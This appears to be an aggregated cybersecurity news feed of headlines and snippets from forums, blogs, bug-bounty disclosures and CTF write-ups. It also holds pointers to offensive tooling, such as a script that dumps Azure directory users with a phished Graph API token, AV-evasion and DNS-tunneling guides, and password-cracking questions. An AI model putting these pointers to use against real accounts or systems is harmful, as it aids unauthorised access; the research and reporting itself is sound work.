    FastJson is an open-source JSON parsing library from Alibaba that can be used to convert Java objects into their JSON representation.
    FreeBuf Morning Report | Gen Z internet users are "normalizing" cybercrime; a Samsung flagship phone was hacked twice in one day
    On the first day of the Pwn2Own Toronto 2022 hacking contest, contestants hacked the Samsung Galaxy S2022 smartphone twice, using zero-day vulnerabilities for input-validation attacks.
    Will AI replace humans? The ChatGPT bot can test for vulnerabilities, review code, and even fix bugs
    The OpenAI research lab launched the ChatGPT chatbot, which has quickly become the hottest thing in artificial intelligence. Should security people be afraid?
    Java: Using PriorityQueue for Deserialization Without InvokerTransformer
    java.util.PriorityQueue is a priority queue whose nodes are ordered by priority into a tree. PriorityQueue has its own readObject deserialization entry point.
    Cybersecurity Architecture: A Security Overview
    Author: zhh. Preface: The cybersecurity architecture diagram is organized according to current cybersecurity requirements and presented along multiple dimensions. This article mainly introduces the overall picture of cybersecurity; detailed introductions to each dimension will be updated continuously later, so stay tuned! National Cyberspace Security Strategy: The widespread application of information technology and the rise of cyberspace have greatly promoted economic and social prosperity and progress, while also bringing new security risks and challenges. Major opportunities: With the rapid development of the information revolution, the network composed of the internet, communication networks, computer systems, automated control systems, digital devices and the applications, services and data they carry
    The "Ukrainian IT Army" shut down Russia's second-largest bank
    This was not only the largest cyberattack recorded this year, but also the largest in the bank's entire history.
  • Open

    How did you go about developing a comprehensive security framework for your organization in order to meet SOC 2 requirements?
    Curious to hear what everyone has to say! submitted by /u/Thecomplianceexpert
    Detection Certifications
    I currently work as a SOC analyst but have gained an interest in the detection side of our workflow. I was wondering if there are any detection related certifications that are reasonably priced? Only one I can find is GIAC Certified Detection Analyst, however these certs can cost 3k plus to take submitted by /u/DoubleAgent10
    SSRF protection in Java / Spring
    Trying to protect against SSRF in a Java / Spring web application. We want to be able to offer customers the ability to enter in a webhook URL. So we can't easily allowlist what domains / URLs they can/can't use. The only way forward I see, is a piece of functionality that resolves every DNS record and checks if it's a private IP address, localhost, link local, etc. Is there a pre-existing library / function we can use for this? Or is there another way? submitted by /u/Soggy_Bag_8745
  • Open

    Bypass Microsoft Graph API paging limitation
    Bypass Microsoft Graph API paging limitation and dump all users' objects using a Graph API token (Illicit Grant Phishing Attack). The graphAPIDump script iterates through the @odata.nextLink property in the result response to retrieve all the user objects. https://github.com/lutzenfried/OffensiveCloud/blob/4de3846faffa13d813872ffae6b990fa670dae6e/Azure/Tools/graphAPIDump.py submitted by /u/lutzenfried

  • Open

    DOS protection via modsec
    Hi, I'm curious if anyone here has resources or maybe a link for a good how-to specific to DOS mitigation using modsec. I have modsec + nginx up and functional and the core rule sets include DDoS protection via REQUEST-912-DOS-PROTECTION, but what I'm struggling with is figuring out how to define thresholds. E.g. how in the world do we rate limit connections from xyz to 1K / sec and if exceeded block? submitted by /u/elsewhere1
    Proxy server worth it?
    I have a small homelab where I host game servers, some plex with external access, and potentially a calibre library. I've been doing this for a couple years and recently moved and upgraded my setup. Originally I had an ISP modem & router (separate at least) that just fed into a managed switch and I had my daily driver desktop and an esxi installation. I ran snort with a sys log, but not in-line, just to keep track of anything hitting the ESXi server. I never had any issues. I now feel better after moving - fiber network with way higher up/down, and basically some VLANs with a dedicated inline pfSENSE at the front of it, with snort (thinking about suricata) and pfBlocker. I'm using vcenter with a cluster, but doing all the same type of stuff - hosting servers and media for friends. Someone recently asked me why I don't use a proxy for hiding my IP address and I realized I just never thought about it all that much. I understand there's always inherent risk exposing yourself to the web but in my mind, obscuring my IP address at the cost of increased latency/potentially decreased network performance and having minor cloud infrastructure to manage (and pay for) just doesn't seem worth it. But, it's also possible I'm very stupid. Am I being stupid? submitted by /u/Hollowpoint357
    Free Live Webinar - TLS 1.3 and how it differs from prior versions of TLS/SSL - 12/15/2022 @ 2:30p PST 5:30p EST
    A few days ago, I asked this subreddit if there was interest in a free live webinar discussing TLS 1.3 and how it differs from previous versions of SSL/TLS. The response was overwhelmingly positive, so I'm offering the webinar Thursday 12/15/2022 at 2:30p PST / 5:30p EST. TLS 1.3 and how it differs from previous versions of SSL and TLS Thursday :: 12/15/2022 :: 02:30p PST / 05:30p EST Duration: 2 hours Agenda: 60-75~ minutes of lecture, with 3 breaks for Q&A followed by free for all Q&A on anything TLS/SSL related for the remainder of the session. Topics I plan to cover: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys Middleboxes - what they are, how they inhibited smooth TLS 1.3 transition For each topic I plan to describe how a feature worked in TLS 1.2 and prior, how it was broken, and how TLS 1.3 improved it. If you're apprehensive about registering and providing your email address, no worries, I understand. This link should take you directly to the watch page (a zoom invite link will pop up when the countdown expires). Q: Will the session be recorded? Yes. It will be recorded and made available to those who register. If you want the replay you'll have to register. Q: Will there be more sessions? Sure. I'll do more, and on other topics, if the subreddit wants and as long as it doesn't violate any subreddit policies. I asked the mods specifically about this one and got no response... went ahead and scheduled hoping the positive reception in the initial request was enough for at least this session. submitted by /u/erh_
    Anyone use Qualys?
    I've been using Qualys a little over a year now. I've found it to be extremely unreliable and their support about McAfee level of horror. We renewed assuming the worst was behind us recently and they shut us down for 3 weeks now after processing our renewal due to some platform bugs. Last year was about 3-4 weeks of lost service as well. Curious if we're alone or if others are having problems? submitted by /u/Cheatyhax
    Setup MacOS Mojave in Hp Pavilion
    Any trusted site from where I can download MacOS? submitted by /u/Few_Grapefruit6628
    What do pen testers study?
    Pen testers of reddit, when you guys aren't working what do y'all study? Also how do you guys study, and keep up with your work? submitted by /u/AlternativeNo5023
    Steghide Linux Steganography how to get "Passphrase"
    Hello all, I am currently on Parrot Linux and have an image that has hidden steganographic data inside. I know I need to decode it with Steghide in the Parrot Terminal. I also know that I will find out the hidden steganographic data (which will be extracted to a .txt file) with the command: "steghide extract -sf IMAGE.jpg -p PASSPHRASE". The question is, using a command that steghide provides... how would I get the PASSPHRASE to find the hidden message within the image jpg? Oh also, I know the seed is "Found (possible) seed: "b40d0b29"" - now I am not sure what that means and if that can assist me in any way, but I thought I'd drop that here just in case. Thanks all! submitted by /u/PrimeHuntOfficial
    What are the key netsec industry publications and reports everyone should read?
    See above. Thanks! submitted by /u/NiceHolidayNot
  • Open

    Pickle Rick -THM
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 6] It’s beginning to look a lot like phishing — No Answers :P
    No content preview
    TryHackMe writeup: Bounty Hacker
    In this room, I join forces with Faye Valentine et al to get a bunch of internet terrorists with FTP and privilege escalation hacks! Continue reading on InfoSec Write-ups »
    Reflected XSS using Double Encoding
    No content preview
    Intercepting HTTP traffic with OpenVPN on Android
    No content preview
    HTB Time [writeup]
    Exploiting the RCE and SSRF Vulnerabilities Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 5] He knows when you’re awake — No Answers :P
    No content preview
    How to Hack Applications’ Logic
    No content preview
    [WRITE-UP] ATO bug in a target who wasn’t running any bug bounty program (Bounty: 40K INR)
    No content preview
    HTB University CTF 2022 — Cloud — Enchanted
    No content preview
  • Open

    An open source SMS gateway for pentest projects
    submitted by /u/aunga
    The Last Breath of Our Netgear RAX30 Bugs - A Tragic Tale before Pwn2Own Toronto 2022
    submitted by /u/Gallus
    Moobot Uses a Fake Vulnerability
    submitted by /u/chicksdigthelongrun
  • Open

    Ability to change permissions across seller platform
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1783001 - Bounty: $5000
    Unprotected Atlantis Server at https://152.70..
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1793526
    XSS in linktr.ee - on link thumbnail adding
    Linktree disclosed a bug submitted by jagata: https://hackerone.com/reports/1775162 - Bounty: $600
  • Open

    The Activist Rot: How Harvard is fast becoming the leading purveyor of disinformation online
    It reads like the script for a straight-to-streaming low-budget thriller. Continue reading on Dialogue & Discourse »
    Advent of Cyber 4 (2022): Day 3 Write-up
    It’s time to do some OSINT! Welcome to Day 3 of Advent of Cyber 4 (2022) write-up. To check the room, click here. Continue reading on System Weakness »
    Google mail Hacking — Ghunt V2 (Gmail OSINT)
    I have already covered Gmail OSINT in one of my previous articles, and with help of you guys, it's one of my top articles. But today, we… Continue reading on System Weakness »
  • Open

    High-Risk PowerShell Commands
    Invoke-NinjaCopy Continue reading on Medium »
    HTB University CTF 2022 — Cloud — Enchanted
    Hack The Box University CTF is a great CTF for university and college students all around the world. The challenges represent a real world… Continue reading on InfoSec Write-ups »
  • Open

    Account takeover without user interaction on sign with Facebook flow
    Night Hunter is not one person; a night hunter is everyone who chose to hack for a reason. Night hunters are always thirsty for more and more… Continue reading on Medium »
    Bug Hunting 101 — Credential Stuffing Vulnerabilities
    TL;DR- Credential stuffing can be exploited for high-level bug bounties, and can pose dangerous potential exploits. Continue reading on The Gray Area »
    Some of the best cybersecurity youtube channels
    Here are some of the best cybersecurity youtube channels that I am aware of: Continue reading on Medium »
    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must-have tools for bug bounties. Continue reading on Medium »
    How we breached ZDFheute live on television
    In summer this year, we came across some security misconfiguration in Germany’s biggest — and one of Europe’s largest — Television… Continue reading on Medium »
    Leaking STRIPE Live Key leading to information disclosure:: Bounty: $1000
    Hey Hunters, Continue reading on Medium »
    How I Found and Exploit Google Maps API Key
    Hey Everyone, Continue reading on Medium »
  • Open

    DEV-0139 launches targeted attacks against the cryptocurrency industry
    submitted by /u/SCI_Rusher
    Linux PrivEsc(2) — Abusing Scheduled Tasks (cron)
    submitted by /u/Clement_Tino
  • Open

    Hoarder is a script made to collect and parse the most valuable artifacts for forensics or incident response investigations rather than imaging the whole hard drive
    submitted by /u/boutnaru
  • Open

    SecWiki News 2022-12-06 Review
    JNDI Injection via Deserialization and Overriding trustURLCodebase by SecIN community. For more recent articles, visit SecWiki
  • Open

    Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
    submitted by /u/soupcreamychicken
    Exploit Education's Phoenix Stack Three Challenge Writeup
    Hi everyone, I have just released the writeup for Exploit Education's Phoenix Stack Three challenge. Any reactions & feedback would be most welcome. Thanks in advance! https://medium.com/bugbountywriteup/phoenix-challenges-stack-three-984e0434356b submitted by /u/ProgrammingBro123
  • Open

    Moobot Uses a Fake Vulnerability
    Article URL: https://vulncheck.com/blog/moobot-uses-fake-vulnerability Comments URL: https://news.ycombinator.com/item?id=33880471 Points: 1 # Comments: 0
  • Open

    More Active Directory for Script Kiddies
    Introduction So… Active Directory is amazing. It tells me everything I want to know—a regular Ask Jeeves for the whole domain—but I’m sure there is more that it can do. What else am I missing? In a previous article, I described the Active Directory (AD) service and how a Script Kiddie might use it to... The post More Active Directory for Script Kiddies appeared first on TrustedSec.
  • Open

    How to Use the pycrypt Encryption Tool to Test the Detection Capability of Antivirus Products
    Researchers can use pycrypt to try to evade any type of antivirus product in order to test the security performance of the target antivirus product.
    FreeBuf Morning Report | Attacker sentenced to 18 months for stealing $20 million; hospital cancels surgeries due to ransomware attack
    Global news: 1. High-severity AMI MegaRAC vulnerabilities affect many servers from AMD, ARM, HPE, Dell and others. Eclypsium researchers found three vulnerabilities in American Megatrends' MegaRAC baseboard management controller (BMC) software that affect server equipment used by many cloud service and data center operators. [Foreign press - read the original] 2. CISA urges Google to patch a Chrome vulnerability before December 26. The Cybersecurity and Infrastructure Security Agency (CISA) has in its
    Microsoft warns Europe: prepare for cyber warfare with Russia this winter
    Russia may target supply chain attacks and push influence operations
    Survey launched for the CCSIP 2022 China Cybersecurity Industry Panorama (5th Edition)
    Submission period: from today until December 27.
    High-severity AMI MegaRAC vulnerabilities affect many servers from AMD, ARM, HPE, Dell and others
    Eclypsium researchers found three vulnerabilities in American Megatrends' MegaRAC baseboard management controller (BMC) software.
    Sneak peek at the agenda | See you in the CIS 2022 cybersecurity multi-dimensional live stream
    On December 14, join, attend and network online together.
  • Open

    The Ultimate Smart Contract Test
    Smart contracts are merely computer programs running on a blockchain, and we all know that computer programs are almost never without bugs… Continue reading on Medium »
  • Open

    OSS-Fuzz – continuous fuzzing for open source software
    Article URL: https://github.com/google/oss-fuzz Comments URL: https://news.ycombinator.com/item?id=33878128 Points: 3 # Comments: 1
  • Open

    Vice Society: Profiling a Persistent Threat to the Education Sector
    Vice Society, a ransomware gang, has been involved in high-profile activity against schools this year. The post Vice Society: Profiling a Persistent Threat to the Education Sector appeared first on Unit 42.

  • Open

    Windows security updates classified by CVE
    Article URL: https://msrc.microsoft.com/update-guide Comments URL: https://news.ycombinator.com/item?id=33873712 Points: 1 # Comments: 0
    CVE-2022-4170: rxvt-unicode code execution via background OSC
    Article URL: https://www.openwall.com/lists/oss-security/2022/12/05/1 Comments URL: https://news.ycombinator.com/item?id=33871617 Points: 1 # Comments: 0
  • Open

    TryHackMe | Advent of Cyber 22 | Day 3 OSINT Walkthrough
    Nothing escapes detective McRed Continue reading on The Sleuth Sheet »
    Smoke Signals: Creating a Virtual Burner Phone
    A guide on creating a cost effective and quickly disposable VoIP phone that is hidden within a secondary user on Android devices. Continue reading on Medium »
    SNMP- Simple Network Management Protocol (Information Gathering)
    SNMP stands for Simple Network Management Protocol. Continue reading on System Weakness »
    - ANALYSIS OF CRYPTO FR. — V1-
    Using a map, we will understand how interactions within Crypto Twitter FR work. Continue reading on Medium »
    Open Source Intelligence (OSINT)
    Open-Source Intelligence, or OSINT, is a valuable tool for organizations and individuals seeking to improve their cyber security posture… Continue reading on Medium »
    Advent of Cyber 2022 TryHackMe
    Day 2 Continue reading on Medium »
  • Open

    I believe I may have a rat, is it possible to use wire shark to figure out the application it's coming from and how to remove it?
    I've already done a factory reset that didn't remove personal files as I don't have a method of backup and I have far too many. However I'm worried it might be a rootkit, or it could be I accidentally plugged in a USB drive from a few days before the reset that the rat could have infected without my knowledge. If I could get some direct help to verify if there is/is not a rat I'd appreciate it submitted by /u/CrossOnDiscord
    sslscan
    I started playing around with the Kali box I created on Friday. I have been able to get this to work on our firewall and switch but I cannot get this to run a scan on the desktops or servers. Could someone help me out? submitted by /u/MrMack33
    Would there be interest in a live webinar going through the major differences in TLS 1.3? (is that even in line with this Subs rules?)
    Hi all, TLS 1.3 is a large departure from the TLS versions before it. Would there be interest in a live teaching session (via Zoom; and free, of course) later this week where I run through some of those differences? Mods, is that acceptable for the sub? I don't want to violate any rules =) As a teaser, here would be the differences I would talk through: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys TLS 1.2- Renegotiation is gone Replaced with Key Update & Post Handshake Authentication Session Tickets no longer risk original session Session Tickets protected by TLS session Session Resumption & PSK mode combined Adds option for additional DH Exchange Adds option for Early Data / 0RTT When I've done this before (for the sake of time) I've skipped the last few differences and instead talked about Middleboxes and how they hindered upgrading to TLS 1.3, and the things TLS 1.3 did to "get through" misbehaving middleboxes. submitted by /u/erh_
    Pre Law to Cyber Security
    Hi All! I am currently a pre-law senior due to graduate in the spring but I have some hesitation about going through with this degree. Cybersecurity has intrigued me for a while but my school does not have a bachelor's program, but they do offer a master's program that I was interested in applying to. My question for you all was how can I get into this field: should I get my bachelor's in it, or finish off my degree in an unrelated field and go for my master's in this field, whilst looking for internships? submitted by /u/Trevor14NYK
    WFH ACTIVITY
    Any reports of WFH assets being utilized to DDOS or scan home networks? submitted by /u/N3Y3G0
  • Open

    [Help] I'm looking for a downloadable list of all CVEs including vulnerability
    submitted by /u/much_thanks
    Default NETGEAR Router Configuration Allows Attacks from WAN
    submitted by /u/dinobyt3s
    Hijacking GitHub Repositories by Deleting and Restoring Them
    submitted by /u/whisperingmime
    A Detailed Analysis of The Last Version of REvil Ransomware [PDF]
    submitted by /u/CyberMasterV
    Release of EMBA firmware analyzer in version 1.2.0 - aka London Calling
    submitted by /u/_m-1-k-3_
    Slides: Demystifying Practical DoS Attacks
    submitted by /u/mazen160
    “In startups, your junior dev is more of a threat to security than North Korea.” Appreciate a security expert who knows startups shouldn't waste resources overdoing security when they still don't have product-market fit.
    submitted by /u/maddening_conversati
  • Open

    Coming across C++ BOF (Buffer Overflow) Vulnerabilities Within Libraries (part 2) EXTENSION
    Extension of me exploring a vulnerability and bug found in a C++ library for packet capturing and layer parsing. Continue reading on Medium »
    How to Hack Applications’ Logic
    Hi everyone, I decided to write a guide about finding logical bugs on applications like the web, mobile, and desktop. Actually, this… Continue reading on InfoSec Write-ups »
    Responsible Disclosure — Reflections on the Past 20 years
    It’s hard to believe that over 20 years have passed since Steve Christey and Chris Wysopol published the first substantive call for an… Continue reading on DayBlink Consulting »
    OTP Leaking Through Cookie Leads to Account Takeover
    OTP Bypass Continue reading on Medium »
    [BAC/IDOR] How my father's credit card helped me find this access control issue
    In the name of God, the Most Gracious, the Most Merciful. Continue reading on Medium »
    The Top 8 Cybersecurity Resources for Professionals In 2022
    TL;DR — Some of the best websites and official resources to learn more about industry standards, job requirements, and pen-testing tips. Continue reading on The Gray Area »
  • Open

    IPED Digital Forensic Tool. It is an open source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners.
    submitted by /u/boutnaru
  • Open

    SecWiki News 2022-12-05 Review
    SecWiki Weekly (Issue 457) by ourren; S&P'22: Detecting and Defending Against Illicit Cryptomining in CI Services by ourren. For more recent articles, visit SecWiki
  • Open

    IDOR in Stats API Endpoint Allows Viewing Equity or Net Profit of Any MT Account
    EXNESS disclosed a bug submitted by ashwarya: https://hackerone.com/reports/1644436 - Bounty: $1000
  • Open

    How I Found My First XSS via File upload
    Hey Everyone, Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Hungarian government sends political spam to citizens; Android Messages group chats to support end-to-end encryption
    Google announced that its Android messaging app Messages will begin public beta testing of end-to-end encryption for group chats in the coming weeks.
    City halls and courts in multiple Russian regions hit by cyberattacks; geopolitical motives not ruled out
    This new type of attack can wipe the contents of files of all formats, except those responsible for the operation of the system itself. Its main targets include databases and archives.
    The dark side of SaaS: cyberattacks weaponized and commoditized
    Without knowing how to program, even a simple "one-click operation" can inflict massive damage on a target.
    App Vulnerability Hunting (2): Multiple Apps from the Same Developer Share Common Vulnerabilities
    While testing an app, information gathering and testing revealed that the app's back-end system had SQL injection, XSS, weak password, information leakage and other vulnerabilities.
    Learn to Set Up DNS Tunneling in One Article
    Learn to set up a DNS tunnel in one article
    Multiple serious security vulnerabilities disclosed in Mitsubishi Electric PLCs
    Last week the US Cybersecurity and Infrastructure Security Agency issued an industrial control systems advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software.
    Security vulnerability found in IBM Cloud Databases for PostgreSQL
    IBM has fixed a high-severity security vulnerability affecting its PostgreSQL cloud database product that could be exploited to tamper with internal repositories and run unauthorized code.
    Beware! These Android keyboard apps with 2 million installs can be remotely compromised
    These apps are widely used, but they neither consider users' privacy and security nor have they received any updates; clearly, security was not part of the design when these apps were developed.
  • Open

    Set up Cloud Instances
    AWS Continue reading on InfoSec Write-ups »
    My first experience in hosting a National Level Capture The Flag Competition
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 2] — No Answers :P
    Day 2 Learning Objectives Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    TryHackMe Advent of Cyber 2022 [Day 4] Scanning through the snow— No Answers :P
    Day 4 Learning Objectives Continue reading on InfoSec Write-ups »
    Phoenix Challenges — Stack Three
    No content preview
    Anti-Reversing Techniques (Part 2)
    No content preview
    IW Weekly #36: 1,250€ Bounty, VoIP Spoofing, SSL Pinning, Intercepting Proxy, XSS Resources…
    No content preview
    Learn From 16 Experts at IWCON2022 Cybersecurity Conference
    No content preview
  • Open

    DuckLogs malware performs multiple malicious activities in the wild
    Author: CybleBlogs. Translator: Knownsec 404 Lab translation team. Original link: https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/ Malware-as-a-service gives hackers sophisticated capabilities. Cyble Research and Intelligence Labs (CRIL) has been continuously monitoring newly emerging active malware families in the wild. Recently, CRIL observed a strain named Duck...
  • Open

    TryHackMe Advent of Cyber 2022 [Day 3] — No Answers :P
    Day 3 Learning Objectives: Continue reading on InfoSec Write-ups »
    Exploring whether NASA FIRMS can accurately be used for open-source intelligence activities
    NASA Fire Information for Resource Management System (NASA FIRMS) satellites have been around for more than a decade and have been adopted… Continue reading on Medium »
    Advent of Cyber — Day 3 — Nothing escapes detective McRed
    Link to room: https://tryhackme.com/room/adventofcyber Continue reading on Medium »
    Precious Stone Challenge
    Solution to the challenge posted on Twitter on 18 November 2022. Continue reading on Medium »
    SPY NEWS: 2022 — Week 48
    Summary of the espionage-related news stories for the Week 48 (27 November-3 December) of 2022. Continue reading on Medium »
    OSINT Challenge- 1
    This is a Quiztime OSINT challenge for a post at November 28: Continue reading on Medium »
    TryHackMe: [Day 3] [OSINT] Advent of Cyber 2022: Nothing escapes detective McRed Walkthrough
    Day 3 — Advent of Cyber 2022: Nothing escapes detective McRed: Continue reading on Medium »
    Advent of Cyber 2022 — [Day 3] OSINT Nothing escapes detective McRed Q&A
    Q: What is the name of the Registrar for the domain santagift.shop? Continue reading on Medium »
    TryHackMe Advent of Cyber 4→ DAY 3— Nothing escapes detective McRed
    As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was compromised… Continue reading on rootissh »
  • Open

    Vulnerability and fraud: evidence from the Covid-19 pandemic
    Article URL: https://www.nature.com/articles/s41599-022-01445-5 Comments URL: https://news.ycombinator.com/item?id=33858542 Points: 1 # Comments: 0
  • Open

    Failure[INSTALL_PARSE_FAILED_NO_CERTIFICATES]
    Recently I turned my information security studies toward mobile applications, and right at the start, when I went to begin testing with… Continue reading on Medium »
    Weaponizing Discord Shell via SMB
    In the previous blog / video (https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd /… Continue reading on Medium »
    Mr. Robot THM(linux machine ctf)
    Nmap scan : Continue reading on Medium »
    40 Tips and Tricks to Improve your Bug Bounties as a beginner
    TL;DR — Some great bug hunting tips I’ve accumulated from various sources for beginners looking to gain an edge as soon as possible. Continue reading on The Gray Area »
  • Open

    OWASP Top 10 CI/CD Security Risks project released
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    GitHub Actions - Artifact Poisoning Vulnerability
    submitted by /u/dotanoam [link] [comments]
  • Open

    Cloud Penetration Testing prerequisites
    Hi, when conducting a cloud penetration test (let's say a public cloud like Azure) do you require from the client a guest/user account of the tenant that you are testing? What are the requirements or prerequisites that the client needs to fulfill before the cloud penetration test begins? submitted by /u/5u13 [link] [comments]
    Correct way to Disable PHP Execution
    Found this code from a reddit post 2 years ago: Order Deny,Allow Deny from All But malcare .com article has a bit different code: Order Allow,Deny Deny from all Which is the correct code to do? Want to do this so no can upload anything even if they inside. submitted by /u/yoyobono [link] [comments]
    Python experience, how do I get into cybersecurity?
    Hi everyone, I have good Python experience (not professionally - still a beginner also - self-taught), but I'm comfortable with the language. I've developed simple social media tools, tinkered around with JS and different web frameworks, even sold some code to amateur online marketeers (my main source of income). My question is, at the moment, I'm a new Linux user and still getting comfortable with the OS. I'm interested in cybersecurity and would like to see how my coding skills might benefit me/give me an advantage down the way. Where do I start? I appreciate you're probably seeing this question on a daily basis. PS: basic networking knowledge. submitted by /u/Relevant-Document570 [link] [comments]
  • Open

    SecWiki News 2022-12-04 Review
    Analysis of the principles behind the three deserialization source points in the modified GadgetInspector by 路人甲. For more of the latest articles, visit SecWiki
  • Open

    Noob here, tried adding via hash sets, but failed. Any idea on how to add SHA1 values in the Metadata for Autopsy while viewing an outlook.pst file? I'm able to view the MD5 & SHA256 hash values of the file, however I'm unable to view the SHA1 value. Any advice would be greatly appreciated
    submitted by /u/LMJR500Army [link] [comments]
    Need help decrypting my itunes backup key
    Hello, long story short I made a backup and forgot its password. I think it was about 5-6 characters without symbols. I searched for a while and found that some people had luck with using hashcat's -m14800, but I need help using it. My laptop's card isn't compatible with hashcat for some reason (1660ti), so it's very slow. I want to know if I can send the hash file to someone to try, or how to get hashcat to detect my card drivers and use a dictionary and limit the password length. submitted by /u/codeXII [link] [comments]
  • Open

    How to use scrcpy to manage and control your Android device
    scrcpy is a management and control tool for Android devices that lets researchers display, manage and control Android devices over USB or TCP/IP.
    SCMKit: a powerful security testing suite for source code management systems
    SCMKit, short for Source Code Management Attack Toolkit, is a powerful toolkit for penetration testing SCM (source code management) systems.
    FreeBuf Morning Report | Russian government hit by ransomware attack; US announces "Starshield" satellite project
    SpaceX has officially announced the "Starshield" satellite project, dedicated to government services, on its website homepage. "Starshield" satellites will use Starlink's satellite technology and launch capability to support and safeguard national security work.
    Octopii: an AI-driven personally identifiable information (PII) scanning tool
    Octopii is a powerful AI-driven PII scanning tool that helps researchers scan a directory for image files containing various kinds of personally identifiable information (PII).
  • Open

    BOF Exploit fails outside GDB
    I just started studying exploit development, currently doing exploits for Linux x84 (running on 32-bit Kali Linux). But my exploit is not working outside GDB: running the exploit payload inside GDB is giving me a shell on the machine, but without GDB I am getting an error. Tried googling for this issue but it didn't help. Any idea why this is happening? NB: I am an absolute starter on exploit dev. submitted by /u/Salt_Annual [link] [comments]
    Black Hat 2022 USA/ASIA/Europe
    The videos of the BLACK HAT 2022 conference have been published on YouTube. USA https://www.youtube.com/playlist?list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq ASIA : https://www.youtube.com/playlist?list=PLH15HpR5qRsW2vrD-6pHklASq8T_CPZBv EUROPE : https://www.youtube.com/playlist?list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe submitted by /u/soupcreamychicken [link] [comments]
  • Open

    The Consequences of Hacking Netflix
    It was a dark and stormy night, and John was feeling restless. He had been trying to find something good to watch on Netflix, but nothing… Continue reading on Medium »
    URL Validation Bypass Using Browser URI Normalization
    Hello everyone, I am Marx Chryz and I do bug bounty hunting for about two years now. It’s also been three and a half years since I started… Continue reading on Medium »
    The most underrated injection of all time — CYPHER INJECTION.
    Yo! Continue reading on Medium »
    Top Vulnerability Management Tools You Need to Know!
    What Exactly is Vulnerability Management? Continue reading on Bug Zero »
    ACM CTF-Walkthrough
    Recently I have participated in a FUN cyber challenge competition “ACM Cyber challenge”. All the challenges(beginner friendly with graded… Continue reading on Medium »
    An Actually Useful Rant About an Obnoxious Medium Bug
    Since I do not know if the bug report I filed will have any effect Continue reading on Geeky Pub »
    Mango Markets is Prepared to Award a $47 Mn Bug Reward to a Hacker
    Mango Market: What is that? Continue reading on Bug Zero »
    Zoom’s Bug Bounty Programs Have Reached $1.8 Mn
    Zoom’s private bug bounty program has paid out $2.4 million in cash and merchandise to security researchers. Continue reading on Bug Zero »
    How and why you should collaborate in bug bounty
    In this write-up, I will discuss collaboration in bug bounty programs. I have received many questions about this topic, so I thought it… Continue reading on Medium »

  • Open

    In and out of Bug bounty in 6 months, Made Over $12K
    You read the title. I won’t make any more introductions and bore you for no reason. What happened? How did I do it? With no knowledge at… Continue reading on Medium »
    Follow these 6 bug report enhancements and see the change!
    Improve engineer‘s productivity with 6 simple steps. Continue reading on Medium »
    3 Step IDOR in HackerResume
    Before moving forward with this blog if you don’t have any context over what IDOR is you can refer the same over here Continue reading on Medium »
    A $$$ worth of cookies! | Reflected DOM-Based XSS | Bug Bounty POC
    Hey everyone! This is Haroon Hameed and I’m here to share about my recent finding on Synack Red Team about Reflected DOM-based XSS. Continue reading on Medium »
    Bug Zero at a Glance [Week 26 November — 2 December]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Account Takeover - Inside The Tenant
    Summary : Continue reading on Medium »
    Automating Recon: The Tools and Techniques Used by Today’s Hackers
    Introduction Continue reading on Medium »
    A young computer whiz
    Meet Jack, a young computer whiz who has been fascinated by the world of hacking since he was a teenager. Growing up in the digital age… Continue reading on Medium »
    Websites That Help You Improve Your Ethical Hacking Skills
    A Definitive List Continue reading on Bug Zero »
  • Open

    3 International Texts Sent from Phone on its Own
    So I just got my phone bill and I have 3 SMS texts to an international number I don’t identify listed in the bill. I tried searching in my messages app for the texts and didn’t find any. Does anyone have an idea what this could be? I’m using an iPhone 13 on latest iOS btw. submitted by /u/iclorz [link] [comments]
    What scanners are you using that you'd recommend to an AppSec team for auditing?
    We have desktop, web and mobile products at my company. Currently we grey box audit our products using standard commercial tooling like Burp Pro and open source tools semgrep, ODC and Nmap to find low hanging fruit, then we have a whole team that deep dives for weeks. I think that this is usual for these kinds of teams. I'm wondering how we can enhance that initial low hanging fruit hunt stage. After hearing the term "next gen scanner" used recently I was wondering what commercial tools this sub might recommend, as things must have moved on since the last time I looked at scanners and they were all no better than a well configured Burp. I'm thinking of tools like Snyk, but not Snyk, as maintaining it was historically a pain. submitted by /u/jeffreyshran [link] [comments]
    Is this a hacking script? -- Strange file reappears in INetCache\IE\ folder (noob)
    Hello, Using CCleaner I noticed some files named 2[1] and 2[2] being created in \AppData\Local\Microsoft\Windows\INetCache\IE\032AEAD3, of filetype "file" (I have Hide extensions unchecked in options but there is none displayed). This might just be Microsoft Diagnostics, or a virus hijacking the processes for keylogging. I am pursuing a college-level programming degree so I know a tiny bit more than nothing but this could be anything. Windows 10 Home, Bitdefender Antivirus Free, Malwarebytes Free, O&O Shutup (Tinywall firewall). I will post the entire script and add my own comments in ALLCAPS and add breaks to help with reading, thank you for your time: 'use strict'; class TimeSpan { constructor(ticks) { this.value = ticks; } ticks() { return this.value; } milliseconds() { retu…
    Is there a difference in the level of security of average networked cameras and those provided by security companies?
